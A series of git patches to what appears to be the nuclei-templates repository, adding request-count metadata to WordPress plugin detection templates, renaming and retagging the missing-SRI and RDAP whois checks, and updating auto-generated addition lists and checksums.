a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 34663f85ee8c87a6de08f1ac852c50fc124d0aef Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Sep 2023 16:54:46 +0530 Subject: [PATCH 0107/1090] Update and rename sri-missing.yaml to missing-sri.yaml --- .../{sri-missing.yaml => missing-sri.yaml} | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename http/misconfiguration/{sri-missing.yaml => missing-sri.yaml} (90%) diff --git a/http/misconfiguration/sri-missing.yaml b/http/misconfiguration/missing-sri.yaml similarity index 90% rename from http/misconfiguration/sri-missing.yaml rename to http/misconfiguration/missing-sri.yaml index 4822c5d404..9e2b7aadd6 100644 --- a/http/misconfiguration/sri-missing.yaml +++ b/http/misconfiguration/missing-sri.yaml @@ -1,15 +1,15 @@ -id: sri-missing +id: missing-sri info: - name: SRI missing + name: Missing Subresource Integrity author: lucky0x0d,PulseSecurity.co.nz severity: info - tags: javascript,subresource integrity description: | Checks if script tags within the HTML response have Subresource Integrity implemented via the integrity attribute reference: - https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity metadata: max-request: 1 + tags: compliance,js,sri http: - raw: @@ -19,7 +19,6 @@ http: redirects: true max-redirects: 5 - stop-at-first-match: false matchers-condition: and matchers: - type: xpath From c0f60f267bb79da3635c6b4a2ffc651d236bb762 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Sep 2023 16:56:03 +0530 Subject: [PATCH 0108/1090] adding misconfig tag --- http/misconfiguration/missing-sri.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/missing-sri.yaml b/http/misconfiguration/missing-sri.yaml index 9e2b7aadd6..75d31a0d97 100644 --- a/http/misconfiguration/missing-sri.yaml +++ b/http/misconfiguration/missing-sri.yaml @@ -9,7 +9,7 @@ info: - https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity metadata: max-request: 1 - tags: compliance,js,sri + tags: compliance,js,sri,misconfig http: - raw: From 09f9d3284e109c6cb6a354343881505247427bb5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Sep 2023 17:09:42 +0530 Subject: [PATCH 0109/1090] Update rdap-whois.yaml --- http/miscellaneous/rdap-whois.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/miscellaneous/rdap-whois.yaml b/http/miscellaneous/rdap-whois.yaml index dfe0f14834..f6dc62879a 100644 --- a/http/miscellaneous/rdap-whois.yaml +++ b/http/miscellaneous/rdap-whois.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 1 verified: true - tags: misc,dns,domain,whois,rdap + tags: whois,rdap,osint,misc http: - method: GET @@ -25,7 +25,6 @@ http: redirects: true max-redirects: 3 - extractors: - type: json part: body From a7ff4fab0111e1ad787d94f316a6d3042562ef39 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 11:44:33 +0000 Subject: [PATCH 0110/1090] Auto Generated New Template Addition List [Mon Sep 4 11:44:33 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a58674b28a..ced817657b 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2023/CVE-2023-36844.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml +http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml From f785a4432a91f9ed34efd9d925f756a8d33cc6fa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 11:45:05 +0000 Subject: [PATCH 0111/1090] Auto Generated Templates Checksum [Mon Sep 4 11:45:05 UTC 2023] :robot: --- templates-checksum.txt | 407 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 24126fffc0..2e39d65ad6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:5be92cb0c030c30cb745b9ec77f98db2070b6379 -cves.json-checksum.txt:4b818162c3b563f6d5d776f26283d6bfb40fde73 +cves.json:97ee9433bf7132d31d6e7d54b161a16015ad9dad +cves.json-checksum.txt:bbd214fdb91bc2f11273a84ead4f2b86653b2c7b dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -4248,6 +4248,7 @@ http/miscellaneous/netflix-conductor-version.yaml:58e842f74840a188b1d01b220162de http/miscellaneous/ntlm-directories.yaml:f5c3bab9fa3ac6238150af38b7c142e5bb4fd951 http/miscellaneous/old-copyright.yaml:f2304cbcb45cc844183f11542421f305b22db5fd http/miscellaneous/options-method.yaml:99929d85d875946d3debe94d08fcaeb41548d629 +http/miscellaneous/rdap-whois.yaml:8f6fd0e2c818826c694da87377499fa47bfea6b1 http/miscellaneous/robots-txt-endpoint.yaml:77a2aecea8dd753215ede1443d94a11144636610 http/miscellaneous/robots-txt.yaml:43b0f22528ebff24084bee1b8542d3eaa45ee3e8 http/miscellaneous/security-txt.yaml:01860642627f2d383a9326d0ee0f939a14595ee0 @@ -5796,217 +5797,217 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb 